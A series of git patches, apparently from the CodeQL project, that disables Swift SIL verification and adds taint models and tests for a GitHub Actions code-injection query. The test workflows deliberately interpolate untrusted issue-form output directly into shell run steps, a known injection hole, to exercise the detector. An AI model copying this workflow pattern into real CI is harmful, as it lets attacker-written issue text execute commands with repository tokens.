5a045beff9134231cc661c831809b0fe137e50bf Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Thu, 31 Oct 2024 10:03:08 +0100 Subject: [PATCH 0665/1267] Swift: turn off SIL verifications --- swift/extractor/main.cpp | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/swift/extractor/main.cpp b/swift/extractor/main.cpp index 045d7fdb968..0883b0717fc 100644 --- a/swift/extractor/main.cpp +++ b/swift/extractor/main.cpp @@ -76,6 +76,13 @@ static void processFrontendOptions(codeql::SwiftExtractorState& state, } } +static void turnOffSilVerifications(swift::SILOptions& options) { + options.VerifyAll = false; + options.VerifyExclusivity = false; + options.VerifyNone = true; + options.VerifySILOwnership = false; +} + codeql::TrapDomain invocationTrapDomain(codeql::SwiftExtractorState& state); // This is part of the swiftFrontendTool interface, we hook into the @@ -90,6 +97,7 @@ class Observer : public swift::FrontendObserver { options.KeepASTContext = true; lockOutputSwiftModuleTraps(state, options); processFrontendOptions(state, options); + turnOffSilVerifications(invocation.getSILOptions()); } void configuredCompiler(swift::CompilerInstance& instance) override { From ebd45ace50d3daef7b0457dfdfe868b2d5d64d60 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 31 Oct 2024 10:59:05 +0100 Subject: [PATCH 0666/1267] feat: add source model for peter-murra/issue-forms-body-parser --- ...r-murray_issue-forms-body-parser.model.yml | 6 ++++++ .../CWE-094/.github/workflows/test24.yml | 19 +++++++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 4 ++++ .../CWE-094/CodeInjectionMedium.expected | 3 +++ 4 files changed, 32 insertions(+) create mode 100644 ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml diff --git a/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml b/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml new file mode 100644 index 00000000000..14bd9a7875a --- /dev/null +++ b/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + - ["peter-murray/issue-forms-body-parser", "*", "output.payload", "text", "manual"] diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml new file mode 100644 index 00000000000..a90c55df937 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml @@ -0,0 +1,19 @@ +on: + issues: + +jobs: + test: + runs-on: ubuntu-22.04 + steps: + - name: Run Issue form parser + id: parse + uses: peter-murray/issue-forms-body-parser@v4.0.0 + with: + issue_id: ${{ github.event.issue.number }} + separator: '###' + label_marker_start: '>>' + label_marker_end: '<<' + + - name: Show parsed data JSON + run: | + echo ${{ steps.parse.outputs.payload }} diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index a862c0901ca..a3119c0fd75 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -198,6 +198,7 @@ edges | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | provenance | | | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | provenance | | | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | @@ -583,6 +584,8 @@ nodes | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | semmle.label | Uses Step: parse | +| .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | semmle.label | steps.parse.outputs.payload | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -760,6 +763,7 @@ subpaths | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | ${{ steps.parse.outputs.payload }} | .github/workflows/test24.yml:2:3:2:8 | issues | issues | | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | .github/workflows/test.yml:2:3:2:21 | pull_request_target | pull_request_target | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/untrusted_checkout1.yml:2:3:2:21 | pull_request_target | pull_request_target | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index be14d58737e..0af7aeb0958 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -198,6 +198,7 @@ edges | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | provenance | | | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | provenance | | | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | @@ -583,6 +584,8 @@ nodes | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | semmle.label | Uses Step: parse | +| .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | semmle.label | steps.parse.outputs.payload | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From d85ca107725fd6f277c614ee7c22d3ebc5ad5ba3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 31 Oct 2024 13:36:59 +0100 Subject: [PATCH 0667/1267] fix: account for tojson(expr) expressions --- ql/lib/codeql/actions/ast/internal/Ast.qll | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 1589b18efb0..e5ad86a226c 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1636,7 +1636,7 @@ class StepsExpressionImpl extends SimpleReferenceExpressionImpl { exists(string expr | ( exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or exists(getASimpleReferenceExpression(expression, _)) and expr = normalizeExpr(expression) @@ -1677,7 +1677,7 @@ class NeedsExpressionImpl extends SimpleReferenceExpressionImpl { exists(string expr | ( exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or exists(getASimpleReferenceExpression(expression, _)) and expr = normalizeExpr(expression) @@ -1721,7 +1721,7 @@ class JobsExpressionImpl extends SimpleReferenceExpressionImpl { exists(string expr | ( exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or exists(getASimpleReferenceExpression(expression, _)) and expr = normalizeExpr(expression) @@ -1780,7 +1780,7 @@ class EnvExpressionImpl extends SimpleReferenceExpressionImpl { exists(string expr | ( exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or exists(getASimpleReferenceExpression(expression, _)) and expr = normalizeExpr(expression) @@ -1815,7 +1815,7 @@ class MatrixExpressionImpl extends SimpleReferenceExpressionImpl { exists(string expr | ( exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or exists(getASimpleReferenceExpression(expression, _)) and expr = normalizeExpr(expression) From 0211902116d2216877ce7126434cd7475d43f218 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 31 Oct 2024 13:38:17 +0100 Subject: [PATCH 0668/1267] models: add models for zentered/issue-forms-parser --- .../codeql/actions/dataflow/FlowSources.qll | 14 +++++++++ ql/lib/codeql/actions/dataflow/TaintSteps.qll | 21 ++++++++++++++ ...zentered_issue-forms-body-parser.model.yml | 6 ++++ .../CWE-094/.github/workflows/test25.yml | 13 +++++++++ .../CWE-094/.github/workflows/test26.yml | 29 +++++++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 20 +++++++++++++ .../CWE-094/CodeInjectionMedium.expected | 16 ++++++++++ 7 files changed, 119 insertions(+) create mode 100644 ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index fa964f475cf..2fca425642e 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -361,6 +361,20 @@ class Xt0rtedSlashCommandSource extends RemoteFlowSource { override Event getEvent() { result = this.asExpr().getATriggerEvent() } } +class ZenteredIssueFormBodyParserSource extends RemoteFlowSource { + ZenteredIssueFormBodyParserSource() { + exists(UsesStep u | + u.getCallee() = "zentered/issue-forms-body-parser" and + not exists(u.getArgument("body")) and + this.asExpr() = u + ) + } + + override string getSourceType() { result = "text" } + + override Event getEvent() { result = this.asExpr().getATriggerEvent() } +} + class OctokitRequestActionSource extends RemoteFlowSource { OctokitRequestActionSource() { exists(UsesStep u, string route | diff --git a/ql/lib/codeql/actions/dataflow/TaintSteps.qll b/ql/lib/codeql/actions/dataflow/TaintSteps.qll index 80858df909b..56e2c75123c 100644 --- a/ql/lib/codeql/actions/dataflow/TaintSteps.qll +++ b/ql/lib/codeql/actions/dataflow/TaintSteps.qll @@ -91,6 +91,25 @@ predicate xt0rtedSlashCommandActionTaintStep(DataFlow::Node pred, DataFlow::Node ) } +/** + * A read of user-controlled field of the zentered/issue-forms-body-parser action. + */ +predicate zenteredIssueFormBodyParserSource(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof ZenteredIssueFormBodyParserSource and + o.getTarget() = pred.asExpr() and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + ( + not o instanceof JsonReferenceExpression and + o.getFieldName() = "data" + or + o instanceof JsonReferenceExpression and + o.(JsonReferenceExpression).getInnerExpression().matches("%.data") + ) and + succ.asExpr() = o + ) +} + /** * A read of user-controlled field of the octokit/request-action action. */ @@ -130,6 +149,8 @@ class TaintSteps extends AdditionalTaintStep { tjActionsChangedFilesTaintStep(node1, node2) or tjActionsVerifyChangedFilesTaintStep(node1, node2) or xt0rtedSlashCommandActionTaintStep(node1, node2) or + xt0rtedSlashCommandActionTaintStep(node1, node2) or + zenteredIssueFormBodyParserSource(node1, node2) or octokitRequestActionTaintStep(node1, node2) } } diff --git a/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml b/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml new file mode 100644 index 00000000000..1a40a634118 --- /dev/null +++ b/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSummaryModel + data: + - ["zentered/issue-forms-body-parser", "*", "input.body", "output.data", "taint", "manual"] diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml new file mode 100644 index 00000000000..0bd666dc948 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml @@ -0,0 +1,13 @@ +name: Issue Forms Body Parser + +on: issues + +jobs: + process: + runs-on: ubuntu-latest + steps: + - name: Issue Forms Body Parser + id: parse + uses: zentered/issue-forms-body-parser@v2.0.0 + - run: echo ${{ steps.parse.outputs.data }} + - run: echo ${{ toJSON(steps.parse.outputs.data) }} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml new file mode 100644 index 00000000000..8648d86983e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml @@ -0,0 +1,29 @@ +name: Issue Forms Body Parser + +on: + workflow_dispatch: + inputs: + issue_number: + type: string + description: issue number + required: true +env: + GH_TOKEN: ${{ github.token }} + +jobs: + process: + runs-on: ubuntu-latest + steps: + - name: Fetch the issue + id: read_issue_body + run: + echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT + + - name: Issue Forms Body Parser + id: parse + uses: zentered/issue-forms-body-parser@v2.0.0 + with: + body: ${{ steps.read_issue_body.outputs.body }} + + - run: echo ${{ steps.parse.outputs.data }} + - run: echo ${{ toJSON(steps.parse.outputs.data) }} diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index a3119c0fd75..7722e6a2140 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -199,6 +199,13 @@ edges | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | provenance | | | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | provenance | | | .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | provenance | | +| .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | provenance | | +| .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | provenance | | +| .github/workflows/test26.yml:17:9:22:6 | Run Step: read_issue_body [body] | .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | provenance | | +| .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:17:9:22:6 | Run Step: read_issue_body [body] | provenance | | +| .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | provenance | | +| .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | provenance | | +| .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | @@ -586,6 +593,15 @@ nodes | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | semmle.label | Uses Step: parse | | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | semmle.label | steps.parse.outputs.payload | +| .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | semmle.label | Uses Step: parse | +| .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | semmle.label | steps.parse.outputs.data | +| .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | semmle.label | toJSON(steps.parse.outputs.data) | +| .github/workflows/test26.yml:17:9:22:6 | Run Step: read_issue_body [body] | semmle.label | Run Step: read_issue_body [body] | +| .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | semmle.label | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | +| .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | semmle.label | Uses Step: parse [data] | +| .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | semmle.label | steps.read_issue_body.outputs.body | +| .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | semmle.label | steps.parse.outputs.data | +| .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | semmle.label | toJSON(steps.parse.outputs.data) | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -764,6 +780,10 @@ subpaths | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | ${{ steps.parse.outputs.payload }} | .github/workflows/test24.yml:2:3:2:8 | issues | issues | +| .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | ${{ steps.parse.outputs.data }} | .github/workflows/test25.yml:3:5:3:10 | issues | issues | +| .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | ${{ toJSON(steps.parse.outputs.data) }} | .github/workflows/test25.yml:3:5:3:10 | issues | issues | +| .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | ${{ steps.parse.outputs.data }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | +| .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | ${{ toJSON(steps.parse.outputs.data) }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | .github/workflows/test.yml:2:3:2:21 | pull_request_target | pull_request_target | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/untrusted_checkout1.yml:2:3:2:21 | pull_request_target | pull_request_target | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 0af7aeb0958..e6066479576 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -199,6 +199,13 @@ edges | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | provenance | | | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | provenance | | | 